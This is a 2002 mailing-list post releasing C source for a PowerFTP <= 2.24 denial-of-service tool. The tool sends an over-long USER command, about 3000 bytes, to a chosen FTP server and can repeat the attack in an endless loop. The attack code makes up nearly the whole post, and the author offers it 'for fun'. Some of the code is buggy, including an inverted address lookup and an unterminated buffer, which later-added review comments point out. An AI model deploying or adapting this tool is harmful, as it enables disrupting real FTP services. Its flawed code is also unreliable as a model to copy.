
Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)


From: "a b" <p0pt4rtz () hotmail com>
Date: Sat, 12 Oct 2002 00:20:55 -0700

Coded for fun.. I had nothing else to code and had nothing else to do. :P
I coded it cause Armand released C source that wuz for Windows.

Enjoy,
--p0pt4rtz

/*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
*                                                    uNF!
* PowerFTP Denial of Service (Linux Source)          uNF!
* by p0pt4rtz of Trippin Smurfs                      uNF!
* --                                                 uNF!
* Coded for fun :p                                   uNF!
*                                                    uNF!
*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <strings.h>
#include <errno.h>

/* Command verb that sdos() writes at the start of the buffer it sends. */
#define VAR   "USER "
/*
 * Terminal colour sequences used only in the banner printed by main().
 * "\E" is a non-standard escape for ESC (0x1B) that GCC accepts; NORM
 * resets the attributes again.
 */
#define TITLE "\E[37m"
#define p0p   "\E[33;1m"
#define SMURF "\E[36m"
#define NORM  "\E[m"

/* File-scope pointer; the functions in this listing never use it (resolve() declares its own local `he`). */
struct hostent *he;
/* Destination address structure filled in by conn() before connect(). */
struct sockaddr_in sck;

// Forward declarations for the functions defined further down.
void usage(char *progname);
int conn();
int sdos();
size_t resolve(char *name);
void interm(size_t freedom);
void kconn();
void oconn();

// Process-wide state: command-line settings written by main() and the
// socket descriptor shared between conn(), sdos(), kconn() and oconn().
int verbose;            // incremented once per -v
int sock;               // descriptor assigned in conn(), closed in kconn()/oconn()
size_t port, sleepy=0;  // -p value (passed to htons() in conn()); -s value (seconds passed to interm())
char *host=NULL;        // -d value; main() substitutes "127.0.0.1" when it is still NULL

/*
 * Print the synopsis line and the option table to stderr.
 *
 * progname is substituted into the synopsis; both callers in main()
 * pass argv[0].
 */
void
usage(char *progname)
{
    /* The table holds no conversions, so it is written out verbatim. */
    static const char option_table[] =
        "-----------.----------------------------------------------\n"
        "-d <host> | remote host to connect to. (default: 127.0.0.1)\n"
        "-p <#port> | remote port to connect to. (default: 21)\n"
        "-s <#secs> | reattack after n seconds.\n"
        "-v         | verbosity. twice for greater effect.\n"
        "-h         | this help for this lame ass program.\n"
        "           '\n\n";

    fprintf(stderr, "\xac usage: %s <options> -d <host>\n\n", progname);
    fputs(option_table, stderr);
}


/*
 * Create a TCP socket, store it in the global `sock`, and connect it
 * using the global address structure `sck`.
 *
 * Reads the globals `host` and `port`.
 * Returns 0 once connect() succeeds. On failure the failing step is
 * reported with perror() and -1 is returned; the socket is not closed
 * on the connect() failure path.
 */
int
conn()
{
    /*
     * ip receives the result of the == test (0 or 1), and that value is
     * what gets stored in sin_addr further down.
     */
    int ip = (resolve(host) == 0);
    int rc;

    if (ip) {
        perror("resolve");
        return -1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return -1;
    }

    sck.sin_family = AF_INET;
    sck.sin_port = htons(port);
    sck.sin_addr.s_addr = ip;
    memset(&(sck.sin_zero), '\0', 8);

    rc = connect(sock, (struct sockaddr *)&sck, sizeof(struct sockaddr));
    if (rc == -1) {
        perror("connect");
        return -1;
    }

    return 0;
}

/*
 * Build one over-long "USER" line in a stack buffer and send it on the
 * global socket `sock`.
 *
 * Returns 0 when send() does not fail, -1 (after perror) when it does.
 *
 * What reaches the wire is the verb "USER " followed by a run of at least
 * 2995 'i' bytes, a login name far longer than any legitimate one. The
 * post names PowerFTP <= 2.24 as affected but does not describe the fault;
 * presumably the server mishandles an over-long USER argument. A bound on
 * FTP command-line length, in the server or in a filter in front of it, is
 * the control that rejects input of this shape.
 */
int
sdos()
{
 int z;
 char sugawh[3006]; // only indices 0..2999 are ever written below

 sprintf(sugawh, VAR); // stores "USER " and a terminating NUL at index 5

 // Fill indices 5..2999 with 'i'; this overwrites the NUL sprintf() stored.
 for(z=5;z<3000;z++)
   sugawh[z]='i';

 // NOTE(review): nothing stores a terminator after the fill, so strlen()
 // runs on into the six uninitialised bytes at the end of the array and
 // possibly past it; the length handed to send() is not fixed by this code.
 if ((send(sock, sugawh, strlen(sugawh), 0)) == -1) {
   perror("send");
   return -1;

 }

return 0; // send() reported no error
}

/*
 * Turn a dotted-quad string or a host name into an IPv4 address.
 *
 * The string is tried with inet_addr() first; only when that yields its
 * error value (-1) is gethostbyname() consulted, and the first four bytes
 * of the first address it returns are copied out.
 *
 * Returns the address as inet_addr()/gethostbyname() supply it (network
 * byte order), or 0 when the name lookup fails. Because -1 is also how
 * "255.255.255.255" parses, that literal always takes the lookup path.
 */
size_t
resolve(char *name)
{
    unsigned int addr = inet_addr(name);
    struct hostent *entry;

    if (addr != (unsigned int)-1)
        return addr;

    entry = gethostbyname(name);
    if (entry == 0)
        return 0;

    /* h_addr_list[0] is the first address of the entry (what h_addr names). */
    memcpy(&addr, entry->h_addr_list[0], 4);
    return addr;
}


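/*
 * Pause for `freedom` seconds, one sleep(1) call per second.
 *
 * Progress goes to stderr and depends on the global `verbose`:
 *   verbose != 0  prints a start and a finish message,
 *   verbose >= 2  also prints a per-second progress line.
 * stderr is flushed after every step whatever the verbosity, which is
 * what the unbraced original statements did as well.
 */
void
interm(size_t freedom)
{
    size_t elapsed = 0;

    if (verbose != 0) {
        fprintf(stderr, "Sleeping. Standby...\r");
    }
    fflush(stderr);

    /* A size_t counter cannot overflow the way an int counter would when
     * freedom is larger than INT_MAX. */
    while (elapsed < freedom) {
        sleep(1);
        elapsed++;
        if (verbose >= 2) {
            /* %zu is the conversion that matches size_t arguments. */
            fprintf(stderr, "Sleep progress : %zu Seconds out of %zu \r", elapsed, freedom);
        }
        fflush(stderr);
    }

    if (verbose != 0) {
        fprintf(stderr, "Done! \r");
    }
    fflush(stderr);
}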

/*
 * Repeat the connect / send / close cycle without end, calling
 * interm(sleepy) between rounds.
 *
 * Never returns: the process exits with status 1 as soon as conn() or
 * sdos() reports failure, and otherwise the loop keeps going.
 */
void
kconn()
{
    for (;;) {
        fputs("\xb9\tConnecting.. \r", stderr);
        fflush(stderr);
        if (conn() == -1) {
            exit(1);
        }

        fputs("\xb2\tSending sugawh to dis bish.. \r", stderr);
        fflush(stderr);
        if (sdos() == -1) {
            exit(1);
        }

        /* Release this round's descriptor before the next conn() call. */
        close(sock);
        fflush(stderr);
        fputs("\xb3\tDone! \r", stderr);
        fflush(stderr);

        interm(sleepy);
    }
}

/*
 * Run the connect / send / close cycle exactly once.
 *
 * Status lines go to stderr; two newlines are written to stdout at the
 * end. Exits the process with status 1 if conn() or sdos() reports
 * failure.
 */
void
oconn()
{
    fputs("\xb9\tConnecting.. \r", stderr);
    fflush(stderr);
    if (conn() == -1) {
        exit(1);
    }

    fputs("\xb2\tSending sugawh to dis bish.. \r", stderr);
    fflush(stderr);
    if (sdos() == -1) {
        exit(1);
    }

    /* The single connection is finished with; release the descriptor. */
    close(sock);

    fflush(stderr);
    fputs("\xb3\tDone! \r", stderr);
    fflush(stderr);

    fputs("\n\n", stdout);
}

/*
 * Entry point: print the banner, parse -d / -p / -s / -v / -h, echo the
 * chosen settings to stderr, then call oconn() once or, when a non-zero
 * -s interval was given, kconn(), which loops.
 *
 * Exits with status 1 when no arguments are given, on -h, on a host
 * string longer than 2000 characters, and on a port outside 1..65535.
 */
int
main(int argc, char *argv[])
{
    static const char opts[] = "d:p:s:vh";
    char c;

    fputs("\n" TITLE "PowerFTP <= 2.24 Denial of Service (Linux Source)" NORM "\n"
          "by " p0p "p0pt4rtz" NORM " of " SMURF "Trippin Smurfs" NORM "\n"
          "coded for fun :p\n\n", stderr);

    if (argc < 2) {
        usage(argv[0]);
        exit(1);
    }

    /* Options that match none of the branches are silently ignored. */
    for (c = getopt(argc, argv, opts); c != EOF; c = getopt(argc, argv, opts)) {
        if (c == 'd') {
            if (strlen(optarg) > 2000) {
                fprintf(stdout, "too long of a hostname: %s\n", optarg);
                exit(1);
            }
            host = optarg;
        } else if (c == 'p') {
            if (optarg == NULL) {
                port = 80;
            } else {
                port = atoi(optarg);
            }
            /* port is unsigned, so a negative atoi() result ends up above 65535. */
            if (!(port > 0 && port <= 65535)) {
                fprintf(stderr, "invalid portno assignment.\n");
                exit(1);
            }
        } else if (c == 's') {
            sleepy = atoi(optarg);
        } else if (c == 'v') {
            verbose++;
        } else if (c == 'h') {
            usage(argv[0]);
            exit(1);
        }
    }

    if (host == NULL) {
        fprintf(stderr, "no host specified, using default 127.0.0.1\n\n");
        host = "127.0.0.1";
    }

    /* NOTE(review): port and sleepy are size_t but are printed with %d here and below. */
    fprintf(stderr,
            "attack information:\n"
            "'''''''''''''''''''\n"
            "remote host: %s\n"
            "remote port: %d\n", host, port);
    if (sleepy != 0) {
        fprintf(stderr, "attack interm: %d seconds\n", sleepy);
    }
    fprintf(stderr, "-----------------------------\n");

    /* A non-zero interval selects the repeating mode, otherwise one pass. */
    if (sleepy == 0) {
        oconn();
    } else {
        kconn();
    }

}



